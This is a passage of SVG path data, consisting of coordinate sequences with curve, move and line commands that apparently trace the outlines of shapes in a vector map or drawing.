584.22358,181.43583 584.46403,178.33412 C 584.72789,174.93037 588.35878,170.77513 592.69231,168.91757 C 598.80274,166.29833 598.68383,166.20344 589,165.97116 C 587.625,165.93818 584.84023,165.27092 582.81162,164.48835 C 578.45556,162.80794 563.15373,161.56098 558.22815,162.48502 L 554.77599,163.13265 L 557.03336,165.5355 C 558.27491,166.85707 559.67933,167.69818 560.15431,167.40463 C 560.62928,167.11108 561.99799,167.18198 563.19589,167.56217 C 565.02112,168.14148 565.14115,168.43537 563.93694,169.37672 C 562.53945,170.46916 562.11242,172.3068 561.8169,178.5 C 561.73817,180.15 561.18466,181.83061 560.58688,182.23469 C 559.91005,182.6922 560.11684,182.97515 561.13499,182.98469 C 562.03423,182.99311 563.51531,184.13751 564.42626,185.5278 C 565.97061,187.88477 566.22994,187.95235 568.26377,186.5278 C 569.46346,185.68751 572.25738,184.98382 574.47251,184.96404 z M 705.70201,185.76215 C 706.36312,185.25209 707.78775,185.11525 708.86786,185.45806 C 709.94796,185.80087 711.11049,185.63024 711.45124,185.07889 C 711.82059,184.48127 712.96517,184.40757 714.2854,184.8964 C 716.85284,185.84702 723.5121,185.57113 730.10686,184.24093 C 732.64063,183.72985 736.35313,183.37861 738.35686,183.46041 C 740.36059,183.5422 742,183.5816 742,183.54796 C 742,183.51432 741.55575,181.93777 741.01277,180.04452 C 740.28186,177.49598 740.34677,176.39823 741.26277,175.81644 C 742.13505,175.26242 741.9838,175.02611 740.75,175.01531 C 739.7875,175.00689 739,174.55 739,174 C 739,170.34004 737.62416,169.90659 728.30348,170.63011 C 721.53069,171.15584 718.56094,170.863 711.20637,168.9442 L 702.30577,166.62204 L 698.84218,168.66561 C 696.61716,169.9784 694.1487,170.57967 691.93929,170.34702 C 689.42336,170.08209 689.02257,170.21026 690.44645,170.82442 C 692.26417,171.60847 692.2311,171.70727 689.94645,172.31834 C 688.6009,172.67823 685.5875,172.97884 683.25,172.98635 C 680.9125,172.99386 679,173.45 679,174 C 679,174.55 679.47656,175 680.05902,175 C 680.64148,175 680.83992,175.45 680.5,176 C 680.16008,176.55 680.33269,177 680.88357,177 C 681.43445,177 681.72612,177.82585 681.53173,178.83523 C 681.0145,181.52102 681.94958,182.51046 687.4344,185.08102 C 690.90657,186.70831 692.48701,187.03896 692.76773,186.1968 C 693.28873,184.63382 695.88576,184.73071 698.94962,186.42745 C 701.36848,187.767 703.35746,187.57103 705.70201,185.76215 z M 773.75,185.01365 C 775.59185,184.99353 775.37109,178.07963 773.50574,177.36383 C 772.6839,177.04846 772.26046,176.38758 772.56476,175.89522 C 772.86906,175.40285 772.58902,175 771.94244,175 C 771.22473,175 770.95476,174.01697 771.24931,172.47613 C 771.51467,171.08801 771.34213,169.71145 770.86589,169.41712 C 770.38965,169.12278 770,168.3215 770,167.63649 C 770,165.74684 777.42942,165.60757 778.97367,167.46827 C 781.27312,170.23895 782,169.08502 782,162.66395 L 782,156.3279 L 787.84536,154.70275 C 791.0603,153.80891 794.2654,152.38514 794.9678,151.5388 C 795.6702,150.69246 797.77516,150 799.6455,150 C 803.01066,150 803.02962,150.02517 801.4644,152.414 C 799.96586,154.70105 800.00077,154.86547 802.12828,155.54072 C 804.26852,156.22 804.28777,156.31641 802.53856,157.59546 C 801.0821,158.66045 800.94869,159.23325 801.8923,160.37023 C 802.78505,161.44592 804.57707,161.66734 809.08336,161.25873 C 814.34219,160.78187 815.33401,160.9814 817.09369,162.87019 C 818.19828,164.05582 818.82752,165.47007 818.492,166.01295 C 818.15648,166.55583 818.35852,167 818.94098,167 C 819.52344,167 820,167.675 820,168.5 C 820,171.24113 827.07026,170.3413 832.47776,166.91197 C 835.87536,164.75728 838.21466,163.95128 840.21757,164.24524 C 841.79634,164.47695 843.29869,164.32573 843.55613,163.90918 C 844.07954,163.06228 861.14705,163.59451 864.16312,164.55177 C 868.09645,165.80016 870.30199,160.15424 866.76885,157.88142 C 865.3534,156.97088 871.76039,154.97832 873.77818,155.70153 C 874.72518,156.04095 875.18045,155.96491 874.78988,155.53255 C 873.60384,154.21957 876.96454,148.77241 878.57853,149.39176 C 881.27249,150.42553 886,148.86527 886,146.94239 C 886,145.9482 886.85843,144.86232 887.90762,144.52932 C 890.8915,143.58228 891.26225,141.25 888.42892,141.25 C 887.10212,141.25 884.55033,140.1774 882.75827,138.86645 C 880.04145,136.879 878.36772,136.49676 872.68633,136.56627 L 865.87266,136.64964 L 862.8808,132.48355 C 859.1639,127.30785 853.8282,124.4864 850.81097,126.10116 C 848.21944,127.48811 843.13524,127.90571 842.75431,126.76292 C 842.51886,126.05659 839.89262,125.42673 835.69098,125.0689 C 835.24602,125.031 835.14086,124.58109 835.45729,124.0691 C 836.65594,122.12965 830.20812,120.23073 827.10941,121.6106 C 824.70788,122.68 818.26621,123.98995 813.13251,124.45288 C 811.68463,124.58344 808.29598,125.04603 805.60219,125.48084 C 800.92799,126.23533 800.81239,126.32923 803.07023,127.53759 L 805.43608,128.80375 L 802.96804,129.17562 C 801.61062,129.38014 800.6125,130.0993 800.75,130.77374 C 800.8875,131.44818 800.2125,132.03655 799.25,132.08122 C 798.08313,132.13537 798.44674,132.581 800.34122,133.41857 C 802.97341,134.5823 803.0619,134.79524 801.54404,136.3131 C 800.3292,137.52794 798.81913,137.80758 795.70282,137.3948 C 790.40027,136.69242 784.36024,136.64679 780.54011,137.28025 C 778.88729,137.55432 776.64801,137.16025 775.46921,136.38787 C 771.76037,133.95775 764.03195,133.81714 760.31843,136.11222 C 758.51809,137.22489 757.08823,138.44232 757.14096,138.81763 C 757.40802,140.71827 756.85429,141.12396 755.51273,140.01057 C 753.63511,138.45228 750.60219,139.52093 751.35257,141.4764 C 751.66062,142.27915 751.47885,143.20405 750.94866,143.53173 C 749.72056,144.29074 751.61502,146.13148 755.30639,147.76592 C 756.8499,148.44934 757.86018,149.41721 757.55146,149.91674 C 757.24273,150.41627 758.22986,150.62171 759.74507,150.37327 C 765.52033,149.42636 770.68638,149.19099 771.60837,149.83277 C 772.13557,150.19975 772.55186,151.70375 772.53346,153.175 C 772.50325,155.5902 772.21761,155.79352 769.59244,155.26849 C 767.01943,154.75389 766.74766,154.92705 767.2305,156.77342 C 767.69363,158.54444 767.33951,158.84745 764.88806,158.77775 C 762.07598,158.6978 760.63342,157 763.37756,157 C 764.13521,157 765.31531,156.325 766,155.5 C 766.68469,154.675 768.04164,154 769.01546,154 C 770.99609,154 772.63272,151.04367 770.71862,150.92349 C 770.04838,150.88141 768.64615,150.68649 767.60257,150.49033 C 765.50717,150.09648 758,153.02472 758,154.2359 C 758,154.65616 756.90532,155 755.56739,155 C 752.71278,155 750.93775,158.72546 753.14299,160.08837 C 753.88934,160.54965 754.3875,161.16846 754.25,161.46353 C 753.17653,163.76707 757.56858,169.853 761.35228,171.30494 C 762.25853,171.6527 763,172.38723 763,172.93723 C 763,173.48723 762.325,173.67821 761.5,173.36163 C 760.46758,172.96545 760,173.42442 760,174.83399 C 760,175.96038 759.55,177.16008 759,177.5 C 758.45,177.83992 758.00043,178.87898 758.00095,179.80902 C 758.0021,181.84935 767.51532,186.17005 770.5,185.48581 C 771.6,185.23364 773.0625,185.02116 773.75,185.01365 z M 769,164.85457 C 767.625,164.37518 765.94727,162.74929 765.2717,161.24148 L 764.0434,158.5 L 766.2717,161.01512 C 767.49727,162.39844 768.95,163.63594 769.5,163.76512 C 771.66634,164.27395 772.47793,164.74826 772,165.22619 C 771.725,165.50119 770.375,165.33396 769,164.85457 z M 840.45475,184.43769 C 841.76616,183.57842 843.43783,182.95674 844.16957,183.05618 C 846.86784,183.42284 848,182.96288 848,181.5 C 848,180.675 847.31088,180 846.46862,180 C 845.62635,180 844.67691,179.32162 844.35874,178.49249 C 844.04058,177.66336 842.5922,176.99675 841.14013,177.01114 C 834.38479,177.07811 829.43462,176.49061 828.75,175.54067 C 827.75307,174.15737 825.84719,176.9656 826.34865,179.07896 C 826.55471,179.94739 826.11056,181.4959 825.36165,182.52009 C 824.61274,183.54428 824,183.87281 824,183.25015 C 824,182.62748 824.47232,181.82612 825.04961,181.46934 C 825.69501,181.07046 825.27456,180.10542 823.95779,178.96339 C 821.91162,177.18876 822.00012,175 824.11803,175 C 824.66803,175 824.79695,175.51953 824.40451,176.15451 C 823.96243,176.86981 824.13019,177.03757 824.84549,176.59549 C 825.48047,176.20305 826,175.05667 826,174.04797 C 826,172.12008 824.13252,171 820.91821,171 C 819.8632,171 819,170.325 819,169.5 C 819,168.675 818.50186,168 817.89301,168 C 817.28417,168 817.00911,167.41865 817.28177,166.70811 C 817.55443,165.99757 817.16869,164.58361 816.42458,163.56597 C 815.28348,162.00543 814.14374,161.79987 809.14535,162.2531 C 804.86372,162.64135 802.83779,162.40921 801.84522,161.41664 C 800.6801,160.25153 800.05576,160.25844 797.73569,161.4621 C 796.23106,162.24271 795,162.45808 795,161.9407 C 795,161.42331 794.13032,161 793.06739,161 C 791.00703,161 789.41321,157.75846 790.56068,155.90181 C 791.00859,155.17708 790.59292,154.9708 789.37523,155.31352 C 782.5962,157.22149 783,156.73715 783,162.9604 C 783,167.21624 783.40419,168.94113 784.5,169.36163 C 785.40438,169.70867 786,169.36676 786,168.50055 C 786,167.71038 787.19249,166.43907 788.64998,165.67541 C 791.86668,163.99001 796.67589,165.40346 797.59678,168.30492 C 798.03628,169.68968 798.79954,170.01614 800.56283,169.57359 C 802.45949,169.09755 803.22912,169.5424 804.38881,171.78498 C 805.74536,174.40826 813.0796,178.84962 818.76452,180.4904 C 820.01001,180.84988 820.81162,181.49579 820.54588,181.92577 C 820.28014,182.35575 821.16918,183.21168 822.52152,183.82785 C 824.59408,184.77217 825.84293,184.50062 830.47152,182.09915 C 836.38399,179.03158 838.45479,179.54487 837.34152,183.80204 C 836.65971,186.40926 837.25901,186.53162 840.45475,184.43769 z M 639.26566,183.09214 C 639.70233,181.4223 639.21681,181.19255 635.37413,181.25064 C 632.95938,181.28715 631.11195,181.44528 631.26872,181.60206 C 631.85256,182.18589 637.52357,184.98791 638.13337,184.99384 C 638.48172,184.99723 638.99125,184.14146 639.26566,183.09214 z M 665.72701,183.02608 C 665.56082,180.81987 663.40028,179.54332 662.44594,181.08748 C 661.78841,182.15138 663.69187,185 665.0603,185 C 665.50877,185 665.80879,184.11174 665.72701,183.02608 z M 559.51541,182.30982 C 560.31316,181.21883 560.47119,179.64294 559.96118,177.86464 C 559.46176,176.12327 559.5636,174.9788 560.23797,174.75401 C 560.82478,174.55841 561.37009,173.51333 561.44978,172.4316 C 561.52948,171.34988 561.9588,169.87568 562.40384,169.15559 C 563.02345,168.15304 562.49736,167.95913 560.15805,168.32781 C 558.36322,168.61068 556.90815,168.33301 556.63049,167.65464 C 556.37056,167.01959 556.12237,167.7375 556.07895,169.25 C 556.03553,170.7625 555.97804,172.3375 555.9512,172.75 C 555.92437,173.1625 555.20269,174.56791 554.34748,175.87312 C 553.49227,177.17834 553.28922,177.93928 553.89627,177.56411 C 555.00335,176.8799 555.22771,177.56962 555.25794,181.75 C 555.27729,184.42679 557.73147,184.74949 559.51541,182.30982 z M 665.5,174.67702 C 665.5,170.32092 663.27843,169.72157 659.84784,173.15216 C 657.82072,175.17928 657.79749,175.37875 659.44798,176.58562 C 660.41174,177.29034 660.92721,178.30876 660.59347,178.84877 C 660.21306,179.46428 661.01516,179.55504 662.74333,179.09203 C 665.11841,178.45569 665.5,177.84455 665.5,174.67702 z M 644.96105,175.97592 C 643.0349,174.7855 644.65426,171.64682 646.75843,172.49218 C 650.7659,174.10221 651.45195,174.12412 649.55887,172.58164 C 648.49125,171.71174 646.91625,170.99181 646.05887,170.9818 C 644.15476,170.95958 637.47252,166.4697 633.79545,162.74188 C 632.30795,161.23385 630.67291,160 630.16203,160 C 629.65115,160 629.00746,158.81934 628.7316,157.3763 C 628.35263,155.39381 628.69072,154.63213 630.11503,154.25967 C 631.15176,153.98856 632,153.14422 632,152.38337 C 632,150.74586 623.98728,150.41272 622.41513,151.98487 C 621.52711,152.87289 617.20713,153.75354 612.86111,153.93251 C 611.95972,153.96963 611.24311,154.5625 611.26865,155.25 C 611.29418,155.9375 611.23049,157.4 611.12713,158.5 C 610.96384,160.23761 610.81591,160.28909 609.99959,158.89239 C 609.48281,158.00821 609.24566,156.32071 609.47258,155.14239 C 609.79189,153.48432 609.3895,152.99337 607.69258,152.97069 C 605.62229,152.94301 605.66732,152.78477 608.5,150.13359 C 610.15,148.58932 612.03331,146.40535 612.68513,145.28034 C 613.78205,143.38714 613.56109,143.18543 609.71692,142.57072 C 607.43257,142.20544 602.9483,140.5776 599.75187,138.95329 C 593.35772,135.70401 591.52043,135.30788 592.30301,137.34726 C 592.96079,139.0614 585.65908,142.40562 582.85799,141.67311 C 581.39979,141.29179 580.99353,141.54075 581.38963,142.57296 C 581.99014,144.13789 581.32287,144.32079 575.75,144.1188 C 573.6875,144.04404 572,144.43673 572,144.99144 C 572,145.54615 572.65383,146 573.45295,146 C 576.19168,146 580.08347,148.34009 579.57002,149.67812 C 579.08992,150.92924 580.28387,151.4822 582.5,151.03509 C 583.05,150.92412 583.17839,151.15495 582.78531,151.54803 C 582.39222,151.94111 582.68848,153.14485 583.44365,154.22301 C 584.64065,155.93197 584.57202,156.42798 582.90835,158.09165 C 581.85876,159.14124 581,160.63098 581,161.40217 C 581,162.97771 586.36146,165.18226 588.34346,164.4217 C 589.05137,164.15005 590.72619,164.3349 592.06528,164.83248 C 594.03534,165.56452 594.9203,165.28513 596.70225,163.36859 C 599.07861,160.81274 601.95454,160.37012 605.1328,162.07107 C 606.68506,162.90182 607.73611,162.73973 609.81706,161.34869 C 611.29268,160.36229 612.88487,159.67109 613.35526,159.8127 C 613.82565,159.95431 614.83231,159.55413 615.59227,158.92342 C 617.56946,157.2825 621.88616,158.65605 623.09584,161.311 C 623.66114,162.55171 625.44455,164.45179 627.05896,165.53341 C 628.67337,166.61504 629.99554,167.8375 629.99712,168.25 C 629.99871,168.6625 631.125,169 632.5,169 C 633.875,169 635,169.45 635,170 C 635,170.55 635.9,171 637,171 C 638.1,171 639,171.45 639,172 C 639,172.55 639.60277,173 640.33948,173 C 641.0762,173 642.20312,174.15037 642.84374,175.55639 C 643.50628,177.0105 644.48389,177.81897 645.11102,177.43139 C 645.88969,176.95014 645.84564,176.52264 644.96105,175.97592 z M 745.96172,173.16459 C 745.42592,172.98011 745.2419,172.41761 745.55279,171.91459 C 745.86367,171.41157 744.76803,171 743.11803,171 C 738.82518,171 738.35041,172.72585 742.20428,174.32155 C 744.54384,175.29025 745.7083,175.36903 746.21795,174.59308 C 746.61283,173.99188 746.49753,173.34907 745.96172,173.16459 z M 831.85676,173.89031 C 830.74668,173.18693 830.77272,173.0063 832,172.89683 C 832.825,172.82324 834.12296,172.84996 834.88435,172.95621 C 835.64574,173.06245 837.44574,172.83921 838.88435,172.46011 C 841.30222,171.82295 841.34877,171.71338 839.5,171.01105 C 838.4,170.59317 836.75975,170.63527 835.85501,171.10462 C 834.05071,172.04061 831.47015,169.89554 832.75868,168.53081 C 833.1664,168.09897 832.02279,168.49704 830.2173,169.41541 C 828.39459,170.34254 827.22712,171.55847 827.5923,172.14935 C 828.03009,172.85771 828.53744,172.75988 829.10969,171.85676 C 829.58252,171.11054 830.03252,170.8375 830.10969,171.25 C 830.18686,171.6625 830.3625,172.45 830.5,173 C 830.6375,173.55 830.80625,174.47656 830.875,175.05902 C 830.94375,175.64148 831.49804,175.81023 832.10676,175.43402 C 832.87829,174.95719 832.80257,174.48961 831.85676,173.89031 z M 846.86882,173.90758 C 848.18552,172.68089 849.92314,172.00814 851.02833,172.29716 C 852.07231,172.57016 853.44811,172.16499 854.08568,171.39677 C 854.72324,170.62854 856.42729,169.98569 857.87244,169.9682 C 859.3176,169.9507 861.35379,169.29012 862.39732,168.50023 C 863.44085,167.71034 864.67835,167.30121 865.14732,167.59105 C 865.61629,167.88089 866,167.6718 866,167.1264 C 866,165.57769 862.96526,164.97006 853.10236,164.54399 C 847.74484,164.31254 844.20757,164.52683 844.53879,165.06277 C 844.86943,165.59775 843.15357,165.70866 840.3953,165.3306 C 837.20769,164.89368 835.89754,165.0252 836.338,165.73787 C 836.69578,166.31678 836.28758,167.05941 835.43087,167.38815 C 834.57417,167.7169 834.16682,168.4609 834.52565,169.0415 C 834.92917,169.69441 835.62095,169.74809 836.33903,169.18219 C 837.07796,168.59987 838.51014,168.89256 840.27873,169.98734 C 842.44323,171.3272 842.7748,171.94201 841.77873,172.76867 C 840.36767,173.93975 840.10938,174 836.5,174 C 831.62278,174 834.0849,175.57406 839.30372,175.79245 C 843.51358,175.96861 845.07384,175.57987 846.86882,173.90758 z M 658.10859,171.875 C 657.89332,171.11875 657.7565,169.66401 657.80456,168.64225 C 657.85277,167.61727 657.05064,166.5645 656.01516,166.29371 C 654.83183,165.98427 654.35346,165.24247 654.72047,164.28606 C 655.18212,163.08302 654.80575,162.91977 652.90127,163.497 C 650.93922,164.09167 650.72864,163.98474 651.75,162.91239 C 655.27179,159.21481 651.64757,156.35535 644.49729,157.19011 C 642.57378,157.41467 641,157.23876 641,156.7992 C 641,155.94839 643.46738,155.68608 648.75,155.9753 C 650.5375,156.07316 652,155.71089 652,155.17024 C 652,154.62959 651.16708,154.40505 650.14908,154.67127 C 649.13107,154.93748 647.56669,154.42383 646.67269,153.52983 C 644.90264,151.75978 642.51393,152.4709 639.98206,155.52162 C 638.84226,156.895 638.8477,157.28784 640.01656,158.01023 C 640.77993,158.48202 641.83997,158.59891 642.37219,158.26997 C 642.95237,157.9114 643.05044,158.42618 642.61709,159.55547 C 642.21955,160.59143 642.20233,161.13101 642.57881,160.75452 C 643.26878,160.06455 651.03207,164.09363 654.21782,166.79506 C 655.44923,167.83927 655.67485,168.73903 655.01463,169.97267 C 654.4109,171.10074 654.49519,172.09519 655.2593,172.8593 C 656.73859,174.33859 658.62443,173.68712 658.10859,171.875 z M 684.5,171 L 681.5,170.23663 L 684.5,170.103 C 686.82527,169.99943 687.16264,169.75135 686,169 C 684.19336,167.83246 680,167.68373 680,168.7872 C 680,169.22015 678.9875,169.64402 677.75,169.72911 C 675.56322,169.87949 675.55454,169.84332 677.44113,168.44192 C 678.50875,167.64886 680.19625,167 681.19113,167 C 682.18601,167 682.92856,166.6625 682.84124,166.25 C 682.75392,165.8375 683.0445,164.66708 683.48696,163.64908 C 684.5426,161.22028 682.29775,159.74822 679,160.70675 C 677.625,161.10641 674.2932,161.44839 671.59601,161.4667 C 667.47681,161.49467 666.64186,161.82007 666.37862,163.5 C 665.75211,167.49836 666.96534,169.12481 670.33412,168.80271 C 672.13869,168.63016 673.42181,168.94956 673.31816,169.54551 C 673.21815,170.12054 674.34315,170.54605 675.81816,170.49108 C 677.29317,170.43612 679.4,170.72461 680.5,171.13219 C 681.6,171.53976 683.625,171.84851 685,171.8183 C 687.27355,171.76835 687.22825,171.69422 684.5,171 z M 663.4349,170.02475 C 667.15029,168.61216 666.58823,166.89773 662.5,167.17306 C 659.88698,167.34904 659,167.86382 659,169.20439 C 659,171.25181 659.81228,171.40207 663.4349,170.02475 z M 698.25967,168.0093 C 701.5852,166.04719 709.98334,165.53518 709.99482,167.29384 C 709.99767,167.73045 710.5625,167.99578 711.25,167.88347 C 711.9375,167.77115 713.76679,168.20143 715.3151,168.83963 C 718.60569,170.19599 728.87721,170.36381 730.88219,169.09397 C 732.05684,168.35002 732.05772,167.75169 730.88808,165.10928 C 730.13111,163.39918 729.14507,162 728.69687,162 C 728.24867,162 728.16008,162.45 728.5,163 C 729.526,164.6601 728.04797,164.13436 724.68328,161.64238 C 718.02946,156.7144 715.56336,156.03241 709.84862,157.53993 C 704.64684,158.91214 702.45474,158.69127 703.55802,156.90613 C 703.88287,156.3805 703.77771,156.01489 703.32433,156.09364 C 700.73623,156.54323 699.78807,155.96028 700.90955,154.60898 C 701.83728,153.49114 701.45633,153.00613 698.96983,152.13933 C 695.4859,150.92482 692.38849,152.20062 691.4211,155.24859 C 691.115,156.21303 689.99503,157.46748 688.93228,158.03625 C 687.86952,158.60501 687,159.95453 687,161.03518 C 687,162.11583 686.59814,163 686.10699,163 C 684.69193,163 683.83026,166.23026 684.94735,167.34735 C 685.50445,167.90445 687.8817,168.67288 690.23013,169.05497 C 692.57856,169.43705 694.58678,169.80599 694.69284,169.87483 C 694.7989,169.94368 696.40398,169.10418 698.25967,168.0093 z M 747.99283,168.87244 C 748.00919,167.44074 744.48593,165.4909 741.59771,165.33327 C 739.89397,165.24028 736.87478,164.7387 734.8884,164.21863 L 731.27679,163.27305 L 732.35689,166.13456 C 733.12179,168.16101 733.93233,168.83887 735.13434,168.45736 C 736.06788,168.16107 737.11771,168.38145 737.4673,168.9471 C 738.13489,170.02728 747.98042,169.95745 747.99283,168.87244 z M 1042.8069,164.47354 C 1042.499,164.16565 1041.9398,164.72065 1041.5643,165.70687 C 1041.0216,167.13207 1041.1365,167.24693 1042.1241,166.26667 C 1042.8075,165.58833 1043.1148,164.78143 1042.8069,164.47354 z M 664.5791,164.56376 C 665.55137,163.59148 665.6678,162.91272 664.9395,162.46261 C 664.34778,162.09691 664.09637,161.19125 664.3808,160.45004 C 664.6674,159.70316 664.07415,158.84092 663.05002,158.51588 C 662.03366,158.1933 660.04118,156.76845 658.62228,155.34955 C 656.09055,152.81783 652.05601,152.66357 653.59729,155.15742 C 653.99552,155.80177 654.4271,157.67329 654.55635,159.31635 C 654.68561,160.95941 655.52277,162.71305 656.41671,163.21333 C 657.31066,163.7136 657.78104,164.54526 657.46202,165.06146 C 656.52001,166.58565 663.01114,166.13172 664.5791,164.56376 z M 1081.7729,164.82713 C 1082.67,163.92996 1083.5703,163.93881 1085.6025,164.86477 C 1087.7945,165.86347 1088.5566,165.80624 1089.9584,164.53764 C 1090.8929,163.69194 1092.4095,163 1093.3287,163 C 1096.0301,163 1095.2429,161.09532 1092.25,160.39024 C 1090.7375,160.03391 1088.2625,158.59115 1086.75,157.18409 L 1084,154.62582 L 1084,157.37865 C 1084,160.91837 1082.2176,164.25254 1080.7953,163.3735 C 1080.1605,162.98116 1079.9719,163.14552 1080.3517,163.76008 C 1080.7151,164.34809 1080.4472,165.05709 1079.7562,165.33564 C 1079.0653,165.6142 1078.9725,165.87763 1079.55,165.92105 C 1080.1275,165.96447 1081.1278,165.47221 1081.7729,164.82713 z M 677.60309,159.96081 C 679.43301,159.26507 681.27231,159.24788 683.16819,159.90879 C 685.7625,160.81317 686,160.69561 686,158.507 C 686,157.19307 685.5108,155.81569 684.91288,155.44616 C 684.31497,155.07663 684.03867,153.96012 684.29889,152.96503 C 684.58681,151.86403 683.72964,150.1571 682.10925,148.60467 C 679.90677,146.49456 678.9325,146.19245 676.47323,146.85699 C 674.83796,147.29887 672.01107,147.32825 670.19127,146.92227 C 667.28091,146.273 666.47222,146.59444 663.4746,149.59206 C 661.60024,151.46643 659.60827,153 659.04802,153 C 658.48776,153 659.68748,151.48046 661.71405,149.62324 L 665.39873,146.24649 L 662.34063,145.57482 C 660.38918,145.1462 657.78402,145.50273 655.14153,146.56005 C 652.86398,147.47134 649.9269,147.94748 648.61469,147.61814 C 647.10731,147.23981 645.77516,147.56599 644.99666,148.50402 C 643.98847,149.71882 644.1949,150.35266 646.13224,151.99085 C 647.50815,153.15431 649.33779,153.78174 650.5,153.48868 C 651.6,153.21131 653.4,152.75126 654.5,152.46635 C 655.80362,152.1287 657.69758,152.98167 659.93946,154.91609 C 661.83116,156.54836 663.716,157.67552 664.128,157.42089 C 664.53999,157.16627 665.24224,157.59224 665.68854,158.3675 C 667.1008,160.82069 673.19714,161.63594 677.60309,159.96081 z M 800.72038,157.34713 C 801.68512,156.44157 801.61874,156.06767 800.41092,155.60419 C 799.56519,155.27965 799.15332,154.56095 799.49563,154.00706 C 799.83795,153.45318 799.45328,153 798.6408,153 C 795.90098,153 794.12286,154.15659 794.67013,155.58276 C 794.96925,156.36224 794.71583,157 794.10699,157 C 793.49814,157 792.98632,156.2125 792.96959,155.25 C 792.94127,153.62001 792.86695,153.62418 791.88591,155.31074 C 788.79771,160.61983 795.57055,162.181 800.72038,157.34713 z M 716.49281,154.63562 C 717.88823,155.17109 719.33251,152.34703 718.41909,150.86908 C 718.09602,150.34634 716.91392,150.20993 715.7922,150.56595 C 714.67048,150.92197 713.24585,151.29043 712.62635,151.38475 C 710.56198,151.69906 708.96004,153.12633 709.56785,154.10978 C 709.8981,154.64414 711.0868,154.78984 712.20939,154.43354 C 713.74483,153.94621 714.05923,154.12193 713.47853,155.14287 C 712.8788,156.19724 712.98959,156.23857 713.97515,155.32814 C 714.67286,154.68362 715.80581,154.37199 716.49281,154.63562 z M 639.72497,153.32508 C 639.90679,152.77962 638.69306,152.33333 637.02778,152.33333 C 634.09712,152.33333 633.31365,152.98031 634.63916,154.30582 C 635.55892,155.22558 639.33414,154.49757 639.72497,153.32508 z M 687.48276,151.9721 C 687.21039,151.5314 687.50487,150.99838 688.13717,150.78761 C 688.99101,150.503 688.97177,149.81576 688.06238,148.11655 C 687.38895,146.85824 686.57832,146.08834 686.26099,146.40568 C 685.94366,146.72301 685.09983,146.49781 684.38581,145.90523 C 681.79971,143.75895 680.77023,146.12638 683.17479,148.69014 C 684.51368,150.11768 685.35269,152.06794 685.15272,153.28783 C 684.85244,155.11967 685.0201,155.22821 686.39171,154.08987 C 687.26416,153.36581 687.75513,152.41281 687.48276,151.9721 z M 690,154 C 690,152.70609 688.29968,152.70609 687.5,154 C 687.16008,154.55 687.58352,155 688.44098,155 C 689.29844,155 690,154.55 690,154 z M 614.53001,151.95144 C 614.97302,151.23464 615.62447,151.27338 616.58903,152.07389 C 617.67353,152.97395 618,152.96043 618,152.01546 C 618,151.32517 618.66794,151.04234 619.52314,151.37051 C 620.7658,151.84736 620.85139,151.59084 619.98796,149.97749 C 618.15103,146.54517 608.29906,148.00982 609.64423,151.51525 C 610.29819,153.21945 613.56603,153.51119 614.53001,151.95144 z M 642.81955,149.13325 C 643.1309,147.05477 644.49963,146.49902 648.41902,146.85971 C 649.47448,146.95685 652.2274,146.31476 654.53661,145.43287 C 656.84582,144.55097 659.62579,143.9803 660.71431,144.16471 C 661.80284,144.34912 662.87492,144.05 663.09672,143.5 C 663.67649,142.06235 652.07227,141.92143 648.75,143.32578 C 647.2375,143.96512 645.99311,144.94087 645.98469,145.49411 C 645.97562,146.08987 645.66982,146.05312 645.23469,145.40397 C 644.18478,143.83769 639.23937,142.80368 638.50227,143.99633 C 638.1611,144.54835 636.74139,145 635.34736,145 C 633.77432,145 632.63929,145.6639 632.3555,146.75 C 632.0021,148.10251 630.88769,148.48184 627.44912,148.42004 C 625.00211,148.37606 623,148.71032 623,149.16284 C 623,149.61536 624.6875,149.95726 626.75,149.92261 C 628.8125,149.88797 631.85,150.27086 633.5,150.77348 C 638.46937,152.28724 642.4521,151.58629 642.81955,149.13325 z M 1086.7463,148.19425 C 1085.7826,147.03307 1085.4754,147.10809 1084.8674,148.65305 C 1083.682,151.66535 1083.8929,152.08385 1085.9492,150.79968 C 1087.4718,149.84878 1087.6462,149.27864 1086.7463,148.19425 z M 621.75,148.83804 C 621.60329,148.15615 623.02575,147.56139 625.19296,147.39847 C 627.22408,147.24578 630.07743,146.34014 631.53374,145.38594 L 634.18156,143.65102 L 631.52976,142.2616 C 628.26968,140.55347 628.54416,137.6356 632.01022,137.15418 C 633.3796,136.96398 635.0625,136.34638 635.75,135.78174 C 637.274,134.53008 637.41708,130 635.93261,130 C 635.34555,130 635.12584,129.17887 635.44437,128.17527 C 636.24072,125.66619 632.29195,123.58283 628.96164,124.755 C 626.07729,125.77021 625.43045,125.71787 621.6849,124.16621 C 618.10221,122.68201 617.67158,122.70176 618.29323,124.32177 C 618.89626,125.89325 615.37274,128.41212 614.51434,127.0232 C 613.87755,125.99286 610.78185,126.81639 611.38833,127.85478 C 612.14351,129.14777 610.02367,133 608.55698,133 C 607.34355,133 607.24393,133.51138 608.04625,135.62164 C 608.76933,137.52349 608.6939,138.67441 607.7715,139.8136 C 606.78323,141.03412 606.77845,141.21663 607.75,140.63294 C 608.4375,140.2199 609,140.35852 609,140.94098 C 609,141.52344 610.35,142 612,142 C 614.94575,142 615.97115,143.28176 614,144.5 C 612.05866,145.69982 613.03513,147 615.87756,147 C 617.46021,147 619.31531,147.675 620,148.5 C 621.49258,150.29845 622.089,150.41366 621.75,148.83804 z M 637.46884,143.05041 C 637.79279,142.52626 640.25612,142.36143 642.96718,142.68252 C 646.74236,143.12963 648.25624,142.88661 649.51075,141.6321 C 651.2675,139.87536 651.34458,139.91945 645.86478,139.54666 C 644.96541,139.48547 643.50632,138.83517 642.62235,138.10154 C 641.46473,137.1408 639.48088,136.95935 635.53059,137.45291 C 629.56354,138.19844 628.90688,139.4235 633,142.17391 C 635.97178,144.17082 636.6894,144.31157 637.46884,143.05041 z M 1087.3319,142.57756 C 1087.6321,141.79522 1088.77,141.00772 1089.8605,140.82756 C 1091.8309,140.50205 1091.8312,140.47511 1089.8975,136.52172 C 1088.8273,134.33366 1088.0143,131.85866 1088.091,131.02172 C 1088.3728,127.94437 1087.9304,127.5 1084.585,127.5 C 1082.23,127.5 1081.4514,127.83892 1082.0764,128.59201 C 1082.5748,129.19261 1082.8741,129.873 1082.7413,130.10398 C 1082.6086,130.33496 1083.0337,129.9094 1083.6861,129.15828 C 1084.9673,127.683 1085.0029,127.90814 1085.1999,138.75 C 1085.2923,143.83878 1086.2134,145.49231 1087.3319,142.57756 z M 667.64637,139.23907 C 670.00382,137.52179 670.2276,136.97917 669.12588,135.65168 C 668.41195,134.79144 668.11812,133.6179 668.47293,133.0438 C 668.82774,132.46971 668.58638,132 667.93657,132 C 667.10672,132 667.06277,131.628 667.7889,130.75 C 